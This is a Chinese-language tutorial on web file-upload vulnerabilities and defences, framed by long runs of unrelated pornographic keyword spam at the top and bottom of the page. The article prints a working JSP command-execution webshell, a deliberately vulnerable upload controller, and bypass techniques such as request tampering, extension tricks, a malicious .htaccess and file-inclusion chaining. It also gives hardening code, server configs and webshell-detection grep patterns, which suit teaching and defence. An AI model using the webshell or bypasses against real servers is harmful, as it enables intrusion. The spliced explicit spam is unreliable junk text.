亚洲有码Av一区二区三区_国产高清啪啪免费视频_69色视频国产_国产成人人人爆出白浆_国产精品自在线拍国_一本久久伊人热热精品无码_午夜性刺激在线看免费带字幕_助力高品质欧美狂喷水_亚洲精品日韩无码_精品无码一区二区三区蜜臀_麻豆高清国产AV_熟妇人素无码中文字幕_亚洲a级片在线观看_国产欧美日韩三区_99国产成人高清在线观看

ARTICLE DETAIL

資訊詳情

深耕商務(wù)建站與企業(yè)官網(wǎng)運(yùn)營的一線實(shí)戰(zhàn)洞察。

Web文件上傳安全:從漏洞原理到防御實(shí)戰(zhàn)

Web文件上傳安全:從漏洞原理到防御實(shí)戰(zhàn) 在實(shí)際 Web 開發(fā)與安全測試中文件上傳功能是業(yè)務(wù)剛需也是安全重災(zāi)區(qū)。一個看似簡單的上傳接口背后涉及前端校驗(yàn)、后端處理、文件存儲、權(quán)限控制、安全過濾等多個環(huán)節(jié)任何一個環(huán)節(jié)的疏忽都可能導(dǎo)致嚴(yán)重的安全漏洞例如惡意文件上傳、服務(wù)器被控制、數(shù)據(jù)泄露等。對于開發(fā)者而言理解如何安全地實(shí)現(xiàn)文件上傳對于安全研究者或滲透測試人員而言理解如何發(fā)現(xiàn)并利用文件上傳漏洞是兩項(xiàng)同等重要的核心技能。本文將以一個實(shí)戰(zhàn)視角深入探討 Web 文件上傳的完整流程、常見安全漏洞的成因、攻擊手法以及對應(yīng)的防御策略。我們將從開發(fā)一個基礎(chǔ)的文件上傳功能開始逐步引入安全風(fēng)險并演示攻擊者如何繞過層層防御最終目標(biāo)是構(gòu)建一個既滿足業(yè)務(wù)需求又具備足夠安全性的文件上傳模塊。無論你是正在開發(fā)相關(guān)功能的 Java 或 PHP 開發(fā)者還是正在學(xué)習(xí) CTFCapture The Flag中 Web 題目或進(jìn)行滲透測試的安全愛好者這篇文章都將提供從原理到實(shí)踐的具體指導(dǎo)。1. 理解文件上傳的核心流程與安全邊界文件上傳不僅僅是用戶選擇文件并點(diǎn)擊“提交”按鈕那么簡單。一個完整的、考慮安全性的文件上傳流程通常涉及客戶端瀏覽器、服務(wù)器端應(yīng)用程序、服務(wù)器運(yùn)行環(huán)境如 Tomcat、Nginx以及最終的文件存儲系統(tǒng)本地磁盤、對象存儲等多個層面。1.1 標(biāo)準(zhǔn)文件上傳流程分解當(dāng)用戶通過網(wǎng)頁表單上傳文件時數(shù)據(jù)會以multipart/form-data的格式編碼并通過 HTTP POST 請求發(fā)送到服務(wù)器。服務(wù)器端應(yīng)用程序如 Spring MVC、Servlet、PHP接收到請求后需要解析這些復(fù)雜的數(shù)據(jù)提取出文件內(nèi)容和其他表單字段。一個簡化的安全上傳流程應(yīng)包含以下步驟前端校驗(yàn)通過 JavaScript 檢查文件大小、類型后綴名提供即時反饋提升用戶體驗(yàn)。注意前端校驗(yàn)極易被繞過絕不能作為安全依賴。HTTP 請求接收Web 容器如 Tomcat或框架如 Spring解析multipart/form-data請求。后端校驗(yàn)核心安全環(huán)節(jié)文件類型校驗(yàn)檢查文件的真實(shí)類型而非僅依賴后綴名。常用方法包括檢查文件內(nèi)容魔數(shù)Magic Number、MIME 類型。文件大小限制在代碼和服務(wù)器配置如 Nginx、Tomcat層面限制上傳文件大小防止拒絕服務(wù)攻擊DoS。文件名處理對上傳的文件名進(jìn)行重命名如使用 UUID防止路徑遍歷和覆蓋關(guān)鍵文件。內(nèi)容安全檢查對圖片文件進(jìn)行二次渲染對文本文件進(jìn)行惡意代碼掃描。安全存儲目錄權(quán)限上傳目錄應(yīng)設(shè)置為不可執(zhí)行腳本。例如在 Linux 下目錄權(quán)限應(yīng)為755文件權(quán)限應(yīng)為644。目錄隔離文件不應(yīng)存儲在 Web 根目錄下應(yīng)通過程序映射訪問。例如文件實(shí)際存儲在/var/uploads/通過/file/{id}這樣的控制器接口讀取并返回。使用對象存儲將文件上傳至阿里云 OSS、騰訊云 COS 等對象存儲服務(wù)徹底分離 Web 服務(wù)器和文件存儲。訪問控制對下載或訪問上傳文件的接口進(jìn)行權(quán)限校驗(yàn)防止未授權(quán)訪問。1.2 文件上傳漏洞的本質(zhì)文件上傳漏洞產(chǎn)生的根本原因在于服務(wù)器對用戶上傳的文件數(shù)據(jù)未進(jìn)行充分、有效的驗(yàn)證導(dǎo)致攻擊者能夠上傳被服務(wù)器解釋執(zhí)行的可執(zhí)行文件如.jsp,.php,.asp或特定配置下的.jpg。攻擊成功的關(guān)鍵在于上傳的文件必須能夠被 Web 服務(wù)器以某種方式“執(zhí)行”。例如上傳一個.jsp文件到 Tomcat 的 Web 應(yīng)用目錄該文件就會被 Tomcat 的 JSP 引擎編譯執(zhí)行。上傳一個.php文件到 Apache PHP 環(huán)境的網(wǎng)站根目錄該文件就會被 PHP 解析器執(zhí)行。在某些錯誤配置下上傳一個包含 PHP 代碼的.jpg文件如果服務(wù)器配置了AddType application/x-httpd-php .jpg該圖片文件也會被當(dāng)作 PHP 執(zhí)行。2. 環(huán)境準(zhǔn)備與靶場搭建為了清晰地演示漏洞和防御我們需要一個實(shí)驗(yàn)環(huán)境。你可以選擇以下任意一種方式2.1 使用 Docker 快速搭建漏洞靶場對于安全學(xué)習(xí)使用現(xiàn)成的漏洞靶場是最快的方式。這里推薦upload-labs一個專注于文件上傳漏洞的練習(xí)平臺。# 1. 確保已安裝 Docker docker --version # 2. 拉取 upload-labs 鏡像 docker pull c0ny1/upload-labs # 3. 運(yùn)行容器將容器內(nèi)80端口映射到宿主機(jī)的8080端口 docker run -d -p 8080:80 --name upload-labs c0ny1/upload-labs # 4. 訪問 http://localhost:8080 即可開始挑戰(zhàn)2.2 手動創(chuàng)建簡易漏洞演示項(xiàng)目Java Web如果你想從開發(fā)者視角理解漏洞產(chǎn)生可以創(chuàng)建一個簡單的 Spring Boot 項(xiàng)目。項(xiàng)目初始化使用 Spring Initializr 或 IDE 創(chuàng)建一個 Spring Boot 項(xiàng)目依賴選擇Spring Web和Thymeleaf用于簡單前端。創(chuàng)建上傳頁面(src/main/resources/templates/upload.html)!DOCTYPE html html xmlns:thhttp://www.thymeleaf.org head meta charsetUTF-8 title不安全的上傳演示/title /head body h2文件上傳不安全版本/h2 form action/upload methodpost enctypemultipart/form-data input typefile namefile / br/br/ input typesubmit value上傳 / /form p th:text${message}/p /body /html創(chuàng)建漏洞控制器(src/main/java/com/example/demo/controller/UnsafeUploadController.java)import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.multipart.MultipartFile; import org.springframework.web.servlet.ModelAndView; import java.io.File; import java.io.IOException; Controller public class UnsafeUploadController { // 定義一個不安全的存儲路徑在Web可訪問目錄下 private final String UPLOAD_DIR src/main/resources/static/uploads/; GetMapping(/) public String index() { return upload; } PostMapping(/upload) public ModelAndView handleFileUpload(RequestParam(file) MultipartFile file) { ModelAndView mav new ModelAndView(upload); if (file.isEmpty()) { mav.addObject(message, 請選擇一個文件上傳。); return mav; } try { // 漏洞點(diǎn)1直接使用原始文件名存在路徑遍歷風(fēng)險 String fileName file.getOriginalFilename(); // 漏洞點(diǎn)2文件存儲在Web靜態(tài)資源目錄下可直接通過URL訪問 File dest new File(UPLOAD_DIR fileName); // 創(chuàng)建目錄如果不存在 dest.getParentFile().mkdirs(); file.transferTo(dest); mav.addObject(message, 文件上傳成功: dest.getAbsolutePath()); } catch (IOException e) { e.printStackTrace(); mav.addObject(message, 文件上傳失敗: e.getMessage()); } return mav; } }配置(src/main/resources/application.properties)# 設(shè)置單個文件最大大小僅為示例實(shí)際需要更多配置 spring.servlet.multipart.max-file-size10MB spring.servlet.multipart.max-request-size10MB運(yùn)行這個 Spring Boot 應(yīng)用你就擁有了一個具備典型漏洞的上傳點(diǎn)。3. 常見文件上傳漏洞攻擊手法與演示我們將基于上面創(chuàng)建的簡易漏洞項(xiàng)目演示幾種常見的攻擊手法。3.1 攻擊手法一直接上傳 Webshell這是最基礎(chǔ)的情況服務(wù)器未做任何過濾。準(zhǔn)備 Webshell創(chuàng)建一個簡單的 JSP Webshell 文件shell.jsp。% page importjava.util.*,java.io.*% % // 非常簡單的命令執(zhí)行Webshell if(request.getParameter(cmd) ! null) { Process p Runtime.getRuntime().exec(request.getParameter(cmd)); OutputStream os p.getOutputStream(); InputStream in p.getInputStream(); DataInputStream dis new DataInputStream(in); String disr dis.readLine(); while ( disr ! null ) { out.println(disr); disr dis.readLine(); } } %發(fā)起攻擊訪問http://localhost:8080/選擇shell.jsp文件并上傳。訪問 Webshell如果上傳成功文件將位于http://localhost:8080/uploads/shell.jsp。訪問該 URL并附加參數(shù)?cmdwhoami即可在頁面上看到服務(wù)器執(zhí)行whoami命令的結(jié)果。漏洞原因后端代碼未對文件后綴名、內(nèi)容做任何檢查且文件存儲在 Web 可訪問目錄。3.2 攻擊手法二繞過前端校驗(yàn)很多網(wǎng)站僅在前端通過 JavaScript 檢查文件后綴名。前端校驗(yàn)示例在upload.html的form標(biāo)簽前添加 JS 代碼。script function checkFile() { var file document.querySelector(input[typefile]).files[0]; var fileName file.name; var ext fileName.substring(fileName.lastIndexOf(.) 1).toLowerCase(); if (ext ! jpg ext ! png ext ! gif) { alert(只允許上傳圖片文件 (jpg, png, gif)); return false; } return true; } /script form ... onsubmitreturn checkFile() ...繞過方法方法A禁用JS在瀏覽器設(shè)置中禁用 JavaScript即可直接上傳任意文件。方法B代理攔截修改使用 Burp Suite 或 Fiddler 等抓包工具。先正常選擇一個test.jpg文件上傳用抓包工具截獲 POST 請求。在抓包工具中將請求體中的文件名test.jpg修改為shell.jsp同時確保文件內(nèi)容Content-Disposition部分和后續(xù)的二進(jìn)制內(nèi)容是正確的 Webshell 代碼。將修改后的請求發(fā)送給服務(wù)器。結(jié)果服務(wù)器接收到的是shell.jsp的文件名和內(nèi)容前端校驗(yàn)被完全繞過。漏洞原因信任了完全由客戶端控制的數(shù)據(jù)。3.3 攻擊手法三繞過黑名單校驗(yàn)特殊解析漏洞假設(shè)后端采用了黑名單機(jī)制禁止了.jsp,.php,.asp等后綴。// 在Controller中添加黑名單檢查 String[] blackList {.jsp, .php, .asp, .aspx, .jspx}; String fileName file.getOriginalFilename().toLowerCase(); for (String badExt : blackList) { if (fileName.endsWith(badExt)) { mav.addObject(message, 禁止上傳此類文件); return mav; } }攻擊者可以嘗試以下繞過方式大小寫繞過.Jsp,.PhP如果后端校驗(yàn)時未統(tǒng)一轉(zhuǎn)為小寫。雙寫后綴繞過shell.jsp.jsp如果后端只簡單地刪除一次.jsp字符串。空格/點(diǎn)號繞過shell.jsp.或shell.jsp末尾空格在某些系統(tǒng)處理文件名時會被忽略。利用解析特性Apache如果配置不當(dāng)shell.php.jpg可能被解析為.php文件。IIS 6.0shell.asp;.jpg或shell.asp:.jpg目錄名曾是有名的解析漏洞。Nginx錯誤配置fastcgi導(dǎo)致shell.jpg/.php被解析為 PHP 文件。.htaccess攻擊針對 Apache如果服務(wù)器允許上傳.htaccess文件攻擊者可以上傳一個自定義的.htaccess內(nèi)容為AddType application/x-httpd-php .jpg這將使該目錄下所有.jpg文件都被當(dāng)作 PHP 執(zhí)行。然后再上傳一個包含 PHP 代碼的shell.jpg即可。3.4 攻擊手法四繞過內(nèi)容類型MIME校驗(yàn)有些后端會檢查 HTTP 請求頭中的Content-Type。// 檢查Content-Type if (!file.getContentType().equals(image/jpeg) !file.getContentType().equals(image/png)) { mav.addObject(message, 文件類型不正確); return mav; }繞過方法和繞過前端校驗(yàn)一樣使用抓包工具如 Burp Suite直接修改請求頭中的Content-Type將其改為image/jpeg而請求體中的文件內(nèi)容仍然是 Webshell。漏洞原因Content-Type同樣來自客戶端請求頭完全可控不可信。3.5 攻擊手法五利用文件包含漏洞配合上傳這是一種組合攻擊。假設(shè)網(wǎng)站存在文件包含漏洞如 PHP 的include($_GET[‘file’])且上傳功能對圖片內(nèi)容做了嚴(yán)格檢查如二次渲染導(dǎo)致無法直接上傳可執(zhí)行腳本。攻擊步驟上傳一個內(nèi)容為?php phpinfo();?的純文本文件命名為info.txt。由于內(nèi)容是文本可能通過檢查。利用文件包含漏洞訪問http://victim.com/include.php?file./uploads/info.txt。服務(wù)器執(zhí)行了include將info.txt的內(nèi)容作為 PHP 代碼解析從而執(zhí)行了phpinfo()。漏洞原因上傳點(diǎn)與文件包含漏洞點(diǎn)形成“組合拳”本地文件包含LFI可以包含用戶上傳的文件。4. 構(gòu)建安全的文件上傳功能了解了攻擊方式我們就可以有針對性地構(gòu)建防御。安全是一個過程需要多層防護(hù)。4.1 防御策略總覽防御層具體措施目的前端JS 校驗(yàn)文件大小、類型改善用戶體驗(yàn)非安全措施網(wǎng)絡(luò)層WAFWeb應(yīng)用防火墻攔截已知攻擊payload應(yīng)用層核心1. 白名單文件后綴2. 校驗(yàn)文件類型魔數(shù)3. 重命名文件UUID4. 限制文件大小5. 圖片二次渲染/壓縮6. 病毒/惡意代碼掃描實(shí)現(xiàn)業(yè)務(wù)邏輯層面的安全校驗(yàn)服務(wù)器配置1. 上傳目錄無執(zhí)行權(quán)限2. 資源文件通過程序讀取3. 定期清理未關(guān)聯(lián)文件防止上傳的文件被直接執(zhí)行架構(gòu)層使用對象存儲OSS/COS實(shí)現(xiàn)業(yè)務(wù)服務(wù)器與文件存儲分離4.2 安全上傳代碼實(shí)現(xiàn)Java Spring Boot 示例下面是一個相對安全的文件上傳控制器實(shí)現(xiàn)import org.springframework.beans.factory.annotation.Value; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.*; import org.springframework.web.multipart.MultipartFile; import org.apache.commons.io.FilenameUtils; import org.apache.tika.Tika; import javax.imageio.ImageIO; import java.awt.image.BufferedImage; import java.io.*; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.Arrays; import java.util.List; import java.util.UUID; Controller public class SafeUploadController { // 從配置文件中讀取確保不在Web目錄下 Value(${app.upload.dir:/var/uploads/}) private String uploadBaseDir; // 允許上傳的文件類型白名單后綴名 private static final ListString ALLOWED_EXTENSIONS Arrays.asList(jpg, jpeg, png, gif); // 允許的MIME類型白名單 private static final ListString ALLOWED_MIME_TYPES Arrays.asList(image/jpeg, image/png, image/gif); // 最大文件大小 5MB private static final long MAX_FILE_SIZE 5 * 1024 * 1024; PostMapping(/safe-upload) ResponseBody public String handleSafeFileUpload(RequestParam(file) MultipartFile file) { // 1. 檢查文件是否為空 if (file.isEmpty()) { return 文件為空。; } // 2. 檢查文件大小 if (file.getSize() MAX_FILE_SIZE) { return 文件大小超過限制5MB。; } // 3. 校驗(yàn)文件后綴名白名單 String originalFileName file.getOriginalFilename(); String fileExtension FilenameUtils.getExtension(originalFileName).toLowerCase(); if (!ALLOWED_EXTENSIONS.contains(fileExtension)) { return 不支持的文件類型。; } // 4. 校驗(yàn)文件真實(shí)類型使用Apache Tika檢測魔數(shù) try { Tika tika new Tika(); String detectedType tika.detect(file.getBytes()); if (!ALLOWED_MIME_TYPES.contains(detectedType)) { return 文件真實(shí)類型與后綴名不符或不被允許。; } } catch (IOException e) { return 文件類型檢測失敗。; } // 5. 如果是圖片可以進(jìn)行二次渲染徹底清除元數(shù)據(jù)和非圖像數(shù)據(jù) if (fileExtension.matches(jpg|jpeg|png|gif)) { try { BufferedImage image ImageIO.read(file.getInputStream()); if (image null) { return 上傳的文件不是有效的圖片。; } // 這里可以添加圖片壓縮、縮放等處理 // ImageIO.write(image, png, ...); } catch (IOException e) { return 圖片處理失敗文件可能已損壞。; } } // 6. 生成安全的存儲文件名和路徑 String safeFileName UUID.randomUUID().toString() . fileExtension; // 使用UUID重命名 Path uploadPath Paths.get(uploadBaseDir).toAbsolutePath().normalize(); Path filePath uploadPath.resolve(safeFileName); // 確保上傳目錄存在且安全 try { Files.createDirectories(uploadPath); // 重要檢查目錄是否在預(yù)期范圍內(nèi)防止路徑遍歷 if (!filePath.normalize().startsWith(uploadPath.normalize())) { return 無效的文件路徑。; } } catch (IOException e) { return 無法創(chuàng)建上傳目錄。; } // 7. 保存文件 try (InputStream inputStream file.getInputStream()) { Files.copy(inputStream, filePath); } catch (IOException e) { return 文件保存失敗。; } // 8. 返回文件訪問ID非真實(shí)路徑通過另一個安全接口訪問 String fileId safeFileName; // 實(shí)際可能用數(shù)據(jù)庫關(guān)聯(lián)ID return 文件上傳成功。訪問ID: fileId; } // 安全訪問文件的接口 GetMapping(/file/{fileId}) public void getFile(PathVariable String fileId, HttpServletResponse response) { // 1. 根據(jù)fileId從數(shù)據(jù)庫或緩存中查詢真實(shí)文件名和路徑此處簡化 // 2. 進(jìn)行權(quán)限校驗(yàn)如用戶是否登錄、是否有權(quán)訪問此文件 // 3. 從安全的存儲目錄讀取文件流 Path filePath Paths.get(uploadBaseDir, fileId).normalize(); File file filePath.toFile(); if (!file.exists()) { response.setStatus(HttpServletResponse.SC_NOT_FOUND); return; } // 4. 設(shè)置正確的Content-Type并輸出流 response.setContentType(Files.probeContentType(filePath)); try (OutputStream os response.getOutputStream(); FileInputStream fis new FileInputStream(file)) { byte[] buffer new byte[1024]; int bytesRead; while ((bytesRead fis.read(buffer)) ! -1) { os.write(buffer, 0, bytesRead); } os.flush(); } catch (IOException e) { response.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR); } } }關(guān)鍵防御點(diǎn)解釋白名單校驗(yàn)只允許明確需要的文件類型。文件類型檢測使用 Apache Tika 等庫通過文件內(nèi)容的魔數(shù)判斷真實(shí)類型不信任后綴名和Content-Type。圖片二次渲染使用ImageIO.read和write處理圖片可以剝離可能隱藏在元數(shù)據(jù)如 EXIF或文件冗余數(shù)據(jù)區(qū)中的惡意代碼。文件重命名使用 UUID 等隨機(jī)字符串避免文件名沖突和路徑遍歷攻擊。路徑安全使用Paths.get().normalize()和startsWith()檢查防止../../../etc/passwd這類路徑遍歷。存儲隔離文件存儲在 Web 根目錄之外如/var/uploads/不能通過http://domain/uploads/xxx直接訪問必須通過后端控制器/file/{id}進(jìn)行鑒權(quán)后訪問。4.3 服務(wù)器與中間件安全配置代碼層面的安全需要配合服務(wù)器配置才能生效。Nginx 配置示例防止上傳目錄執(zhí)行腳本location ^~ /uploads/ { # 如果文件必須放在Web目錄下則禁止執(zhí)行任何腳本 location ~* \.(jsp|php|asp|aspx|pl|py)$ { deny all; return 403; } # 或者對于上傳目錄直接返回403 # deny all; # return 403; }Apache 配置示例在.htaccess或httpd.conf中Directory /var/www/html/uploads # 禁止執(zhí)行任何腳本 php_flag engine off RemoveHandler .php .php3 .php4 .php5 .php7 .phtml RemoveType .php .php3 .php4 .php5 .php7 .phtml # 只允許訪問圖片等靜態(tài)文件 FilesMatch \.(jpg|jpeg|png|gif|ico|txt|pdf)$ Order Allow,Deny Allow from all /FilesMatch FilesMatch \.(php|pl|py|jsp|asp|sh|cgi)$ Order Deny,Allow Deny from all /FilesMatch /DirectoryLinux 目錄權(quán)限# 上傳目錄應(yīng)屬于運(yùn)行Web服務(wù)的用戶如www-data, tomcat chown -R www-data:www-data /var/uploads/ # 目錄權(quán)限755文件權(quán)限644確保目錄不可寫除非需要上傳 chmod 755 /var/uploads/ # 如果程序需要寫文件可以設(shè)置目錄為775但務(wù)必確保沒有執(zhí)行權(quán)限問題5. 文件上傳漏洞的排查與應(yīng)急響應(yīng)即使采取了措施也可能存在未知的繞過方式。需要建立監(jiān)控和響應(yīng)機(jī)制。5.1 如何發(fā)現(xiàn)文件上傳漏洞作為開發(fā)者/防御方代碼審計檢查文件上傳相關(guān)代碼是否僅依賴黑名單、是否未校驗(yàn)內(nèi)容、是否存儲路徑可訪問。日志分析監(jiān)控上傳接口的訪問日志尋找異常請求如頻繁上傳、異常后綴、過大文件。文件系統(tǒng)監(jiān)控使用inotify等工具監(jiān)控上傳目錄警惕非圖片文件尤其是.jsp,.php,.htaccess的出現(xiàn)。安全掃描使用 AWVS、Nessus 或開源工具定期對上傳功能進(jìn)行掃描。作為攻擊方/滲透測試方模糊測試使用 Burp Suite Intruder 或自定義腳本批量嘗試各種繞過技巧大小寫、雙寫、特殊字符、不同 Content-Type。解析漏洞測試針對特定服務(wù)器IIS, Nginx, Apache測試歷史解析漏洞的變種。組合漏洞測試檢查是否存在文件包含、任意文件讀取等漏洞可與上傳點(diǎn)結(jié)合利用。5.2 常見問題排查清單當(dāng)懷疑存在文件上傳漏洞或已遭攻擊時按此清單排查排查項(xiàng)操作命令/檢查點(diǎn)說明1. 檢查近期上傳文件find /var/www/html/uploads -type f -mtime -1(查找1天內(nèi)修改的文件)快速定位可疑新增文件。2. 查找Webshell特征grep -r Runtime.getRuntime|eval(|system(|passthru|shell_exec /var/www/html/在Web目錄中搜索常見危險函數(shù)。3. 檢查服務(wù)器進(jìn)程ps auxgrep java|php|tomcat或netstat -tulnp4. 分析Web訪問日志tail -f /var/log/nginx/access.log | grep \POST.*upload\或搜索.jsp,.php的訪問記錄。定位攻擊來源和攻擊時間。5. 檢查定時任務(wù)crontab -l(當(dāng)前用戶) 和ls /etc/cron.*Webshell 常會添加后門定時任務(wù)。6. 檢查系統(tǒng)用戶cat /etc/passwd查看是否有新增的未知用戶。7. 驗(yàn)證修復(fù)是否生效重新嘗試之前成功的攻擊 payload確認(rèn)是否被攔截。確保修復(fù)措施已生效。5.3 應(yīng)急響應(yīng)步驟隔離立即禁用文件上傳功能或整個應(yīng)用。定位根據(jù)上述排查清單找到被上傳的惡意文件。清除刪除所有發(fā)現(xiàn)的 Webshell 和異常文件。注意檢查文件創(chuàng)建時間、隱藏文件以.開頭、以及可能被插入惡意代碼的正常文件。溯源分析日志確定攻擊入口、攻擊者 IP、攻擊時間線。修復(fù)根據(jù)漏洞原因?qū)嵤┍菊碌?節(jié)的安全措施。加固修復(fù)服務(wù)器配置審查所有上傳點(diǎn)代碼考慮引入 WAF 規(guī)則。監(jiān)控加強(qiáng)日志審計和文件監(jiān)控設(shè)置告警。6. 進(jìn)階話題與最佳實(shí)踐6.1 使用對象存儲服務(wù)將文件上傳至云端對象存儲如阿里云 OSS、騰訊云 COS、MinIO是當(dāng)前的最佳實(shí)踐。它帶來了多重好處安全分離業(yè)務(wù)服務(wù)器與文件存儲分離即使文件被上傳惡意腳本也無法在業(yè)務(wù)服務(wù)器上執(zhí)行。彈性擴(kuò)展存儲容量和帶寬易于擴(kuò)展。高可用與持久性對象存儲通常提供多副本冗余。便捷處理很多服務(wù)提供圖片處理、視頻截幀等能力。集成時通常由業(yè)務(wù)服務(wù)器向?qū)ο蟠鎯Ψ?wù)商申請一個臨時的上傳憑證STS Token前端直接使用該憑證將文件上傳至對象存儲上傳成功后對象存儲回調(diào)業(yè)務(wù)服務(wù)器或前端通知業(yè)務(wù)服務(wù)器文件信息如 URL。業(yè)務(wù)服務(wù)器只保存文件的元信息如存儲路徑、大小、類型不直接處理文件流。6.2 文件內(nèi)容深度檢查對于高風(fēng)險場景需要更深入的內(nèi)容檢查反病毒掃描集成 ClamAV 等開源殺毒引擎對上傳文件進(jìn)行掃描。靜態(tài)代碼分析對于允許上傳的文本文件如 PDF, DOC可以檢查是否包含惡意宏或腳本。沙箱動態(tài)檢測對于無法確認(rèn)的文件可以將其在隔離的沙箱環(huán)境中運(yùn)行觀察其行為。6.3 針對 CTF 與滲透測試的特別技巧在 CTF 或授權(quán)滲透測試中目標(biāo)往往是刻意存在漏洞的。除了上述常見方法還需注意信息收集查看網(wǎng)頁源碼、JS 文件尋找隱藏的上傳點(diǎn)或提示。檢查 HTTP 響應(yīng)頭有時錯誤信息或特殊的響應(yīng)頭會提示服務(wù)器類型、組件版本。嘗試各種解析漏洞研究目標(biāo)服務(wù)器Apache/Nginx/IIS/Tomcat特定版本的已知解析漏洞。利用條件競爭如果服務(wù)器先保存文件再檢查內(nèi)容可能存在時間差可以嘗試在文件被刪除前訪問并執(zhí)行它。結(jié)合其他漏洞如目錄遍歷、文件包含、XXEXML外部實(shí)體注入等與文件上傳結(jié)合形成攻擊鏈。文件上傳功能是 Web 安全的試金石。一個健壯的上傳模塊需要開發(fā)者具備防御性編程思維不信任任何來自客戶端的數(shù)據(jù)并在前端、后端、服務(wù)器配置、網(wǎng)絡(luò)架構(gòu)多個層面實(shí)施縱深防御。對于安全人員而言理解攻擊者的繞過手法是進(jìn)行有效代碼審計和滲透測試的基礎(chǔ)。在實(shí)踐中沒有一勞永逸的銀彈持續(xù)關(guān)注新的攻擊手法定期審查和更新安全策略才是保障系統(tǒng)安全的關(guān)鍵。建議將本文中的安全代碼示例作為起點(diǎn)結(jié)合項(xiàng)目的具體業(yè)務(wù)邏輯和架構(gòu)構(gòu)建適合自身的安全上傳方案。
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
乱精品一区字幕二区| 亚欧毛片基地国产毛片基地| 大乔未久88一区| www.色婷婷.com| 蜜乳视频网站| 立川理惠被中出无码| 999熟女精品| 日韩少妇丰满亚洲| 超碰97起碰| 国产一级特黄大片处女| 91P0RNY大屁股人妻| 97超碰影音| 超碰中文字幕人妻草一区| 国产亚洲在线| 乱伦熟女区| 丁香九月 婷婷| 中文字幕三四五区| 97在线免费视频观看| 骚人妻少妇视频| 人妻精品综合中文字幕在线 | 精品白丝一区| 美熟女逼导航AV操逼| 婷婷情色五月天| 蜜桃久久久久久久| 亚洲国产欧美日韩精品一区二区三区,国产一区二区三区在线看片,欧美性猛交 XXX | 探花激情视频| 欧亚性爱啪啪| 国产 无码 一区二区| 激情五月天插| 免费强奸av| 人妻中文字幕精品无码| 18禁精品网站在线看| 久久伊人最新网址视频| 日韩精品资源专区二区| 亚洲欧洲无码bt精品合集| 91少妇人妻| 久久久久99999| 天天日骚逼熟女| 久久久久久久久国产| 亚洲日韩熟女人妻高清在线| 亚洲限制级| 蜜桃臀AV在线| 蜜臀AV午夜精品久| A一区片| 麻豆久久精品亚洲精品88| 日韩欧美传媒一区国产| 久久久久久九九九| 私人尤物在线精品不卡| 日韩三级在线观看网站| 可以在线观看AV的网站| 亚洲精品亚洲人成人网| 久久神马影院| 欧美日韩制服| 日本性爱视频一级| 青草视频在线看看看看看看看看看| 日本三级R| 国产不卡片| 精品十三区| 日韩97视频| 熟女熟妇一区二区三四区| 精品免费囯产一区二区三区| 亚洲欧美国产va在线播放频| 日韩一级特黄av毛片| 不卡免费av在线播放| 口爆综合网| 久草毛片电影怡| 粉嫩小泬久久久一区二区| 婷婷激情五月综合| 亚洲无线观看久久| 99热这里只有精品地址 | 亚州色综合| 一区二区三区免费视频入口| 99热国产| 国产和美国毛片| 亚洲日韩天堂| 家庭乱伦网站国产| 亚洲天堂人人妻| 人妻无码一区二区三区久久99| 国产一区二区在线看| 国产白丝精品在线观看| 秋霞视频一区二区 | 欧美亚洲| 97久久资源| 四虎在线观看网站| 91人妻最真实刺激绿帽| 99激情| 亚洲日产专区婷婷| 亚洲色图综合| 国产精品久久发布| 欧美 色 亚洲| 偷窥自拍A片| 91丝袜美腿网站| 中文字幕一品色图| 欧美五十路熟| 蜜臀99999| 嗯嗯不要视频| 人人色人人操在线| daxiangjiao你懂的| 操国产逼| 久久免费老司机精品| 天天干1区2区在线| 国产精品免费日韩| 欧洲亚洲人妻无码中字久久三区四区 | 久久精品操| 中国国产精品一区视频| 日本999精品视频| 色淫网站优优视频| 美女自卫慰黄网站免费| 日本顶级天天操狠狠操夜夜操中文字幕| 五月丁香激情四射| 日本高清电影欧美色图| 国产成人五月天丁香花| 强免费黄色网址| 啊操爽品善一区二区三区| 老熟妇乱轮| 精彩视频日韩| 嫩草在线视频| 精品999日本| 欧美日韩国产一区二区小黄片大全| 亚洲五月天激情| 激情婷婷黑人91| 无码少妇精品一区二区60岁老人| 国产蜜臀在线| 婷婷色色网| 强乱老妇中文字幕| 一本一道人妻久久一区二区三区 | 香蕉人欧美综合| 韩国久久97| 中文字幕乱码在线| 日韩在线女优天天干| 日本男人天堂| 国产传媒美日韩av| 95自拍视频在线观看| 久草毛片电影怡| 岛国黄| 久久九九久精品国产尤物|国产精品爽黄69天堂A片潘金莲,国产亚洲精品第一综合 | 黄骗免费网站| 天天综合网1| 国产精品无码论坛| 又大又大又大又粗爽高潮观看| 亚洲骚女一区二区三区| 亚洲91在线播放影院| 内射黑丝袜| 欧美劲爆视频一区二区| 中文字幕人妻丝袜乱一区三区| 人人摸人人干| 日韩在线性爱免费视频| 久久久青草青青国产亚洲免观精品高清完整版_97久久综合区小说区图片区,国精品 | 17c嫩草51久久91嫩草| 国产农村妇女精品一二区| AV天堂国产| 激情黄色五月天| 欧美精品自慰系列寂寞少妇| 久久系列| 涩涩久久精品| 欧美超碰9798| 日本高清一区二区在线| 亚洲综合欧美| 日本男人天堂| 屁股久久久久久久久| 婷色五月天| 国产亚洲精品一区二区三区| 男人天堂导航| 熟妇人妻精品一区二区| 粉嫩AV一区夜夜嗨| 久久综合五月天| 可以免费看黄片的视频| 熟女熟妇一区二区三四区| 麻豆伊人网| 久久97| 中文字幕亚洲永久精品| 精品九九国产无码| 欧美极品美女aaaaaa级黄片| 少妇人妻在线| 亚洲AV不卡在线观看尤物| 九九Av| 国产精品探花视频| 国产精品点击进入在线影院高清| 欧亚韩国999| 嗯嗯,好大,好爽,好骚 | 欧美成人一级麻豆| 97se亚洲| 色偷偷超碰亚洲| 岛国AV一区二区电影| 性一交一乱一交A片久久四色| 天天草夜夜草高潮片| 亚洲av青草久久一区二区| 蜜臀99久久精品久久久久久| 亚洲国产中文字幕| 超碰久久草| 天天爽夜夜欢视| 久久久精品日本一道| 色墦五月丁香| 九九黄色网| 亚洲四虎熟女精品| 人人干人人操人人..com| 色操逼网| 欧美强奸乱能| 乱伦av麻豆| 在线观看免费视频国产| 免费a级毛片av无码久久精品中文字幕| 我要色综合网站| chaopen97久久| 亚州图片第一页| 